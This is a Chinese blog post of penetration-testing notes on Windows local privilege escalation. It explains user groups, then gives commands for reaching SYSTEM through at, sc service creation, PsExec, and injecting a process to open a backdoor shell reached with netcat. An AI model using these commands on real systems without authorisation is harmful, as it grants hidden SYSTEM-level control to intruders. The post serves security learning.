滲透測試之簡單本地提權

Windows系統用戶權限劃分:
Administrators,管理員組,默認情況下,Administrators中的用戶對計算機/域有不受限制的完全訪問權。分配給該組的默認權限允許對整個系統進行完全控制。所以,只有受信任的人員纔可成爲該組的成員。 
Users:普通用戶組,這個組的用戶無法進行有意或無意的改動。因此,用戶可以運行經過驗證的應用程序,但不可以運行大多數舊版應用程序。Users 組是最安全的組,因爲分配給該組的默認權限不允許成員修改操作系統的設置或用戶資料。Users 組提供了一個最安全的程序運行環境。在經過 NTFS 格式化的捲上,默認安全設置旨在禁止該組的成員危及操作系統和已安裝程序的完整性。用戶不能修改系統註冊表設置、操作系統文件或程序文件。Users 可以關閉工作站,但不能關閉服務器。Users 可以創建本地組,但只能修改自己創建的本地組。 
System:擁有和Administrators一樣、甚至比其還高的權限,但是這個組不允許任何用戶的加入,在察看用戶組的時候,它也不會被顯示出來,它就是SYSTEM組。系統和系統級的服務正常運行所需要的權限都是靠它賦予的。
 

Linux系統用戶權限劃分

Users:普通用戶

Root:管理員賬號

windows系統下提權【可用命令行,也可用圖形化界面】

net命令

#HelpAssistant:用於遠程協助的賬號;##SUPPORT——338945a0:用於支持

net user Xuan ##可查看當前賬號信息

提權:【管理員權限提升爲System權限】

1、at命令【at /?】##只能在XP與2003的系統上使用

at <time> /interactive cmd   ##指定時間,使用交互命令防止在後臺運行

###使用taskmgr命令殺死現用戶桌面進程,重啓,則整個界面都在管理員

則此時使用任何操作都是在System賬號下

2、sc命令##可在win7、win8上使用【原理:創建一個服務(默認情況工作在system賬號下)】

sc Create syscmd binPath= "cmd /K start" type= own type= interact【重啓一個命令行窗口 類型爲擁有】

默認情況下沒啓動

命令行下可用sc start syscmd

3、

windows系統有提供一個套件【搞windows系統的人都應該去學習該套件的使用】

https://technet.microsoft.com/en-us/sysinternals/bb545027  參考書籍:windows internals

###whoami插件,複製到C盤system32,運行

###PsExec.exe -i -s cmd  【-i交互模式,-s使用system賬號】

4、注入進程提權【相當於開了一個後門,隱蔽性極高】

將進程注入system服務進程

pinjector.exe進程注入器

###pinjector.exe -l#查看可注入進程

###pinjector.exe -p <PID> cmd <ports>

nc -nv <IP> <ports>  

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章